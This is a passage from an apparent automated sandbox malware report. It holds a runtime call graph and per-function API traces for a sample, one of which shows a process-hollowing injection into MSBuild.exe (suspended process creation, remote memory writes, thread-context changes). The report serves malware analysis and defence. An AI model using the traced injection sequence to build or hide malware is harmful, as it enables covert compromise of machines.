16496->16499 16515 da4ef9 EnterCriticalSection 16497->16515 16501 da6197 16498->16501 16502 da61d3 16499->16502 16508 d9b458 __strnicoll 29 API calls 16501->16508 16506 d9ad6d __strnicoll 14 API calls 16502->16506 16503 da61e9 16504 da6208 16503->16504 16505 da621d 16503->16505 16507 d9ad6d __strnicoll 14 API calls 16504->16507 16516 da625d 16505->16516 16506->16501 16510 da620d 16507->16510 16508->16514 16512 d9ad80 __dosmaperr 14 API calls 16510->16512 16511 da6218 16579 da6255 16511->16579 16512->16511 16514->16472 16514->16474 16515->16503 16517 da626f 16516->16517 16518 da6287 16516->16518 16519 d9ad80 __dosmaperr 14 API calls 16517->16519 16520 da65c9 16518->16520 16525 da62ca 16518->16525 16521 da6274 16519->16521 16522 d9ad80 __dosmaperr 14 API calls 16520->16522 16523 d9ad6d __strnicoll 14 API calls 16521->16523 16524 da65ce 16522->16524 16528 da627c 16523->16528 16526 d9ad6d __strnicoll 14 API calls 16524->16526 16527 da62d5 16525->16527 16525->16528 16532 da6305 16525->16532 16529 da62e2 16526->16529 16530 d9ad80 __dosmaperr 14 API calls 16527->16530 16528->16511 16533 d9b458 __strnicoll 29 API calls 16529->16533 16531 da62da 16530->16531 16534 d9ad6d __strnicoll 14 API calls 16531->16534 16535 da631e 16532->16535 16536 da632b 16532->16536 16537 da6359 16532->16537 16533->16528 16534->16529 16535->16536 16541 da6347 16535->16541 16538 d9ad80 __dosmaperr 14 API calls 16536->16538 16539 d9e531 __fread_nolock 15 API calls 16537->16539 16540 da6330 16538->16540 16542 da636a 16539->16542 16543 d9ad6d __strnicoll 14 API calls 16540->16543 16586 da8994 16541->16586 16545 d9e4f7 ___free_lconv_mon 14 API calls 16542->16545 16546 da6337 16543->16546 16548 da6373 16545->16548 16549 d9b458 __strnicoll 29 API calls 16546->16549 16547 da64a5 16550 da6519 16547->16550 16553 da64be GetConsoleMode 16547->16553 16551 d9e4f7 ___free_lconv_mon 14 API calls 16548->16551 16578 da6342 __fread_nolock 16549->16578 16552 da651d ReadFile 16550->16552 16555 da637a 16551->16555 16556 da6591 GetLastError 16552->16556 16557 da6535 16552->16557 16553->16550 16554 da64cf 16553->16554 16554->16552 16558 da64d5 ReadConsoleW 16554->16558 16559 da639f 16555->16559 16560 da6384 16555->16560 16561 da659e 16556->16561 16562 da64f5 16556->16562 16557->16556 16563 da650e 16557->16563 16558->16563 16564 da64ef GetLastError 16558->16564 16582 da3ff3 16559->16582 16566 d9ad6d __strnicoll 14 API calls 16560->16566 16567 d9ad6d __strnicoll 14 API calls 16561->16567 16569 d9ad93 __dosmaperr 14 API calls 16562->16569 16562->16578 16573 da655a 16563->16573 16574 da6571 16563->16574 16563->16578 16564->16562 16565 d9e4f7 ___free_lconv_mon 14 API calls 16565->16528 16570 da6389 16566->16570 16571 da65a3 16567->16571 16569->16578 16575 d9ad80 __dosmaperr 14 API calls 16570->16575 16572 d9ad80 __dosmaperr 14 API calls 16571->16572 16572->16578 16595 da6666 16573->16595 16574->16578 16608 da690a 16574->16608 16575->16578 16578->16565 16626 da4f1c LeaveCriticalSection 16579->16626 16581 da625b 16581->16514 16583 da4007 _Fputc 16582->16583 16614 da4194 16583->16614 16585 da401c _Fputc 16585->16541 16587 da89ae 16586->16587 16588 da89a1 16586->16588 16591 da89ba 16587->16591 16592 d9ad6d __strnicoll 14 API calls 16587->16592 16589 d9ad6d __strnicoll 14 API calls 16588->16589 16590 da89a6 16589->16590 16590->16547 16591->16547 16593 da89db 16592->16593 16594 d9b458 __strnicoll 29 API calls 16593->16594 16594->16590 16620 da67bd 16595->16620 16597 d9e57f __strnicoll MultiByteToWideChar 16598 da677a 16597->16598 16602 da6783 GetLastError 16598->16602 16605 da66ae 16598->16605 16599 da6708 16606 da66c2 16599->16606 16607 da3ff3 __fread_nolock 31 API calls 16599->16607 16600 da66f8 16603 d9ad6d __strnicoll 14 API calls 16600->16603 16604 d9ad93 __dosmaperr 14 API calls 16602->16604 16603->16605 16604->16605 16605->16578 16606->16597 16607->16606 16609 da6944 16608->16609 16610 da69da ReadFile 16609->16610 16611 da69d5 16609->16611 16610->16611 16612 da69f7 16610->16612 16611->16578 16612->16611 16613 da3ff3 __fread_nolock 31 API calls 16612->16613 16613->16611 16615 da4cb0 _Fputc 29 API calls 16614->16615 16616 da41a6 16615->16616 16617 da41c2 SetFilePointerEx 16616->16617 16619 da41ae __fread_nolock 16616->16619 16618 da41da GetLastError 16617->16618 16617->16619 16618->16619 16619->16585 16621 da67f1 16620->16621 16622 da6862 ReadFile 16621->16622 16623 da667d 16621->16623 16622->16623 16624 da687b 16622->16624 16623->16599 16623->16600 16623->16605 16623->16606 16624->16623 16625 da3ff3 __fread_nolock 31 API calls 16624->16625 16625->16623 16626->16581 16627->16458 16629 d94793 16628->16629 16630 d94703 16628->16630 16631 d91860 std::ios_base::_Init 31 API calls 16629->16631 16635 d947f6 16630->16635 16632 d94798 16631->16632 16634 d94720 _Yarn _Deallocate 16634->16428 16636 d94800 16635->16636 16637 d94802 16635->16637 16636->16634 16638 d9480a 16637->16638 16639 d94811 16637->16639 16640 d9186a std::ios_base::_Init 31 API calls 16638->16640 16641 d92952 std::ios_base::_Init 16 API calls 16639->16641 16642 d9480f 16640->16642 16641->16642 16642->16634 16643->16439 16645 d9cfd2 16644->16645 16647 d9d042 16644->16647 16646 da0efc _Fputc 29 API calls 16645->16646 16651 d9cfd8 16646->16651 16648 da7d00 __fread_nolock 14 API calls 16647->16648 16649 d9cf87 16647->16649 16648->16649 16655 d9cfb2 16649->16655 16650 d9d02a 16652 d9ad6d __strnicoll 14 API calls 16650->16652 16651->16647 16651->16650 16653 d9d02f 16652->16653 16654 d9b458 __strnicoll 29 API calls 16653->16654 16654->16649 16658 d98773 LeaveCriticalSection 16655->16658 16657 d9cfb8 16657->16443 16658->16657 16843 d9422c 16844 d9424e 16843->16844 16848 d94263 16843->16848 16849 d943df 16844->16849 16852 d94448 16849->16852 16853 d943f9 16849->16853 16850 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 16851 d94253 16850->16851 16851->16848 16855 d9c53d 16851->16855 16852->16850 16853->16852 16854 d9c578 69 API calls 16853->16854 16854->16852 16856 d9c548 16855->16856 16857 d9c55d 16855->16857 16859 d9ad6d __strnicoll 14 API calls 16856->16859 16857->16856 16858 d9c564 16857->16858 16865 d9ae1d 16858->16865 16861 d9c54d 16859->16861 16863 d9b458 __strnicoll 29 API calls 16861->16863 16862 d9c573 16862->16848 16864 d9c558 16863->16864 16864->16848 16866 d9ae30 _Fputc 16865->16866 16869 d9b096 16866->16869 16868 d9ae45 _Fputc 16868->16862 16871 d9b0a2 ___scrt_is_nonwritable_in_current_image 16869->16871 16870 d9b0a8 16872 d9b601 _Fputc 29 API calls 16870->16872 16871->16870 16874 d9b0eb 16871->16874 16873 d9b0c3 16872->16873 16873->16868 16880 d9875f EnterCriticalSection 16874->16880 16876 d9b0f7 16881 d9afaa 16876->16881 16878 d9b10d 16892 d9b136 16878->16892 16880->16876 16882 d9afbd 16881->16882 16883 d9afd0 16881->16883 16882->16878 16895 d9aed1 16883->16895 16885 d9aff3 16886 d9b081 16885->16886 16887 d9b00e 16885->16887 16899 da424d 16885->16899 16886->16878 16889 d9bc27 ___scrt_uninitialize_crt 64 API calls 16887->16889 16890 d9b021 16889->16890 16913 da4033 16890->16913 16954 d98773 LeaveCriticalSection 16892->16954 16894 d9b13e 16894->16873 16896 d9af3a 16895->16896 16897 d9aee2 16895->16897 16896->16885 16897->16896 16898 da3ff3 __fread_nolock 31 API calls 16897->16898 16898->16896 16900 da461f 16899->16900 16901 da462e 16900->16901 16902 da4656 16900->16902 16903 d9b601 _Fputc 29 API calls 16901->16903 16904 da0efc _Fputc 29 API calls 16902->16904 16912 da4649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16903->16912 16905 da465f 16904->16905 16916 da4051 16905->16916 16908 da4709 16919 da42a9 16908->16919 16910 da4720 16910->16912 16931 da4454 16910->16931 16912->16887 16914 da4194 __fread_nolock 31 API calls 16913->16914 16915 da404c 16914->16915 16915->16886 16938 da406f 16916->16938 16920 da42b8 _Fputc 16919->16920 16921 da0efc _Fputc 29 API calls 16920->16921 16923 da42d4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16921->16923 16922 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 16924 da4452 16922->16924 16925 da4051 33 API calls 16923->16925 16930 da42e0 16923->16930 16924->16912 16926 da4334 16925->16926 16927 da4366 ReadFile 16926->16927 16926->16930 16928 da438d 16927->16928 16927->16930 16929 da4051 33 API calls 16928->16929 16929->16930 16930->16922 16932 da0efc _Fputc 29 API calls 16931->16932 16933 da4467 16932->16933 16934 da4051 33 API calls 16933->16934 16937 da44b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16933->16937 16935 da450e 16934->16935 16936 da4051 33 API calls 16935->16936 16935->16937 16936->16937 16937->16912 16939 da407b ___scrt_is_nonwritable_in_current_image 16938->16939 16940 da40be 16939->16940 16942 da4104 16939->16942 16948 da406a 16939->16948 16941 d9b601 _Fputc 29 API calls 16940->16941 16941->16948 16949 da4ef9 EnterCriticalSection 16942->16949 16944 da410a 16945 da412b 16944->16945 16946 da4194 __fread_nolock 31 API calls 16944->16946 16950 da418c 16945->16950 16946->16945 16948->16908 16948->16910 16948->16912 16949->16944 16953 da4f1c LeaveCriticalSection 16950->16953 16952 da4192 16952->16948 16953->16952 16954->16894

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00DB519E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00DB5110,00DB5100), ref: 00DB5334
                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00DB5347
                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 00DB5365
                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(0000010C,?,00DB5154,00000004,00000000), ref: 00DB5389
                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(0000010C,?,?,00003000,00000040), ref: 00DB53B4
                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(0000010C,00000000,?,?,00000000,?), ref: 00DB540C
                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(0000010C,00400000,?,?,00000000,?,00000028), ref: 00DB5457
                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(0000010C,?,?,00000004,00000000), ref: 00DB5495
                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(00000088,00190000), ref: 00DB54D1
                                                                                                                                                                    • ResumeThread.KERNELBASE(00000088), ref: 00DB54E0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                    • API String ID: 2687962208-3857624555
                                                                                                                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                    • Instruction ID: c84a7884432f5415c748c626e77cc04a28ad60bba7695c789e702171f96b5b10
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DB1F77260064AEFDB60CF68CC80BDA73A5FF88714F158124EA09AB345D774FA51CBA4
                                                                                                                                                                    Function 00D91614 Relevance: 9.2, APIs: 6, Instructions: 171fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D91098: _strlen.LIBCMT ref: 00D910F9
                                                                                                                                                                    • CreateFileA.KERNELBASE ref: 00D91675
                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00D91685
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00D916AB
                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00D916BA
                                                                                                                                                                    • _strlen.LIBCMT ref: 00D91705
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00D91805
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2911764282-0
                                                                                                                                                                    • Opcode ID: 32d7dbac6a213fc8e405f5c02e412e6e7429e594e9b91a8712d92009f41be623
                                                                                                                                                                    • Instruction ID: 3d0211ecf7361905dfe551f0b975615fc969237d47d3b98ba95104533fd37399
                                                                                                                                                                    • Opcode Fuzzy Hash: 32d7dbac6a213fc8e405f5c02e412e6e7429e594e9b91a8712d92009f41be623
                                                                                                                                                                    • Instruction Fuzzy Hash: 4151DDB5908302EBDB00AF24DC84B2ABBE5FF88314F154A2DF88997351E734D9448B72
                                                                                                                                                                    Function 00D9155C Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D91098: _strlen.LIBCMT ref: 00D910F9
                                                                                                                                                                    • FreeConsole.KERNELBASE ref: 00D9158B
                                                                                                                                                                      • Part of subcall function 00D9123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00D912C7
                                                                                                                                                                    • VirtualProtect.KERNELBASE(00DB5011,00000549,00000040,?), ref: 00D915D7
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00D9160E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2898289550-0
                                                                                                                                                                    • Opcode ID: 31518abf3bd6abe829794102fbdbd918b21f7da3ca690d3ba6015d0220ce5415
                                                                                                                                                                    • Instruction ID: eb897ebe6d8a6a844b733b62f4b5b95991eb52a71885a18e2601b6bb5f6ec25a
                                                                                                                                                                    • Opcode Fuzzy Hash: 31518abf3bd6abe829794102fbdbd918b21f7da3ca690d3ba6015d0220ce5415
                                                                                                                                                                    • Instruction Fuzzy Hash: AA11A371A00209EBEB00BB65AC52BFF7768EF84710F444025F609EB385EA7599154BF5
                                                                                                                                                                    Function 00D9123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 94 d9123b-d91261 95 d91263-d9127c 94->95 95->95 96 d9127e-d91280 95->96 97 d91282-d912ac 96->97 97->97 98 d912ae-d912b6 97->98 99 d912bc-d912c0 98->99 100 d91355-d9136d call d929c6 98->100 101 d912c2-d912df KiUserExceptionDispatcher 99->101 104 d912fc-d9134f 101->104 105 d912e1-d912eb call d9136e 101->105 104->100 104->101 107 d912f0-d912f9 call d91533 105->107 107->104
                                                                                                                                                                    APIs
                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00D912C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                    • String ID: [+]
                                                                                                                                                                    • API String ID: 6842923-4228040803
                                                                                                                                                                    • Opcode ID: 1c9a84ae324317935b6448aaab2c9e82cfccd63f078215b65afd2386026037e0
                                                                                                                                                                    • Instruction ID: d9c024e2925dc2e33f047d9b67102d6e94abe0d244aa596e340aa5f2a7010560
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c9a84ae324317935b6448aaab2c9e82cfccd63f078215b65afd2386026037e0
                                                                                                                                                                    • Instruction Fuzzy Hash: A631F73560C3818FDB26AB3468997EBBBD0ABBD318F18097DD8C987243D1615446CB72
                                                                                                                                                                    Function 00DA5283 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 110 da5283-da52a5 111 da52ab-da52ad 110->111 112 da5498 110->112 114 da52d9-da52fc 111->114 115 da52af-da52ce call d9b601 111->115 113 da549a-da549e 112->113 116 da52fe-da5300 114->116 117 da5302-da5308 114->117 123 da52d1-da52d4 115->123 116->117 119 da530a-da531b 116->119 117->115 117->119 121 da532e-da533e call da55b0 119->121 122 da531d-da532b call da4033 119->122 128 da5340-da5346 121->128 129 da5387-da5399 121->129 122->121 123->113 132 da5348-da534b 128->132 133 da536f-da5385 call da562d 128->133 130 da539b-da53a1 129->130 131 da53f0-da5410 WriteFile 129->131 137 da53dc-da53e9 call da5a5c 130->137 138 da53a3-da53a6 130->138 134 da541b 131->134 135 da5412-da5418 GetLastError 131->135 139 da534d-da5350 132->139 140 da5356-da5365 call da59f4 132->140 149 da5368-da536a 133->149 142 da541e-da5429 134->142 135->134 148 da53ee 137->148 143 da53c8-da53da call da5c20 138->143 144 da53a8-da53ab 138->144 139->140 145 da5430-da5433 139->145 140->149 150 da542b-da542e 142->150 151 da5493-da5496 142->151 156 da53c3-da53c6 143->156 152 da5436-da5438 144->152 153 da53b1-da53be call da5b37 144->153 145->152 148->156 149->142 150->145 151->113 157 da543a-da543f 152->157 158 da5466-da5472 152->158 153->156 156->149 161 da5458-da5461 call d9adf9 157->161 162 da5441-da5453 157->162 163 da547c-da548e 158->163 164 da5474-da547a 158->164 161->123 162->123 163->123 164->112 164->163
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00DA562D: GetConsoleOutputCP.KERNEL32(D54F2704,00000000,00000000,?), ref: 00DA5690
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00D9BBF3,?), ref: 00DA5408
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00D9BBF3,?,00D9BE37,00000000,?,00000000,00D9BE37,?,?,?,00DB4628,0000002C,00D9BD23,?), ref: 00DA5412
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2915228174-0
                                                                                                                                                                    • Opcode ID: 3663a894f73e27f1858d68455c50b1611a836175b64dbdb65b8f84532f5f867a
                                                                                                                                                                    • Instruction ID: 634e242a5d0e4be6419920266901aa8d506db2e884819369fb9b4751086f5ba1
                                                                                                                                                                    • Opcode Fuzzy Hash: 3663a894f73e27f1858d68455c50b1611a836175b64dbdb65b8f84532f5f867a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0961B372D00619EFDF11CFA8E844AEEBBB9EF5A304F180155E804A725AD3B5D941CB70
                                                                                                                                                                    Function 00DA5A5C Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 167 da5a5c-da5ab1 call d956e0 170 da5ab3 167->170 171 da5b26-da5b36 call d929c6 167->171 172 da5ab9 170->172 174 da5abf-da5ac1 172->174 176 da5adb-da5b00 WriteFile 174->176 177 da5ac3-da5ac8 174->177 180 da5b1e-da5b24 GetLastError 176->180 181 da5b02-da5b0d 176->181 178 da5aca-da5ad0 177->178 179 da5ad1-da5ad9 177->179 178->179 179->174 179->176 180->171 181->171 182 da5b0f-da5b1a 181->182 182->172 183 da5b1c 182->183 183->171
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00DA53EE,00000000,00D9BE37,?,00000000,?,00000000), ref: 00DA5AF8
                                                                                                                                                                    • GetLastError.KERNEL32(?,00DA53EE,00000000,00D9BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00D9BBF3), ref: 00DA5B1E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                                    • Opcode ID: 4be024594254c099dbf496936abf202d80b63cce3802e192b6ea3745007ddf5b
                                                                                                                                                                    • Instruction ID: 59fbad6a55dd5544fc14a4f7c282efa8657231be060c66a4e4bb598f69bd928b
                                                                                                                                                                    • Opcode Fuzzy Hash: 4be024594254c099dbf496936abf202d80b63cce3802e192b6ea3745007ddf5b
                                                                                                                                                                    • Instruction Fuzzy Hash: 60217C31A00219DBCF19CF29E980AEDB7F9EB59301F2442A9E906D7215D630EE42CB71
                                                                                                                                                                    Function 00D9FF89 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
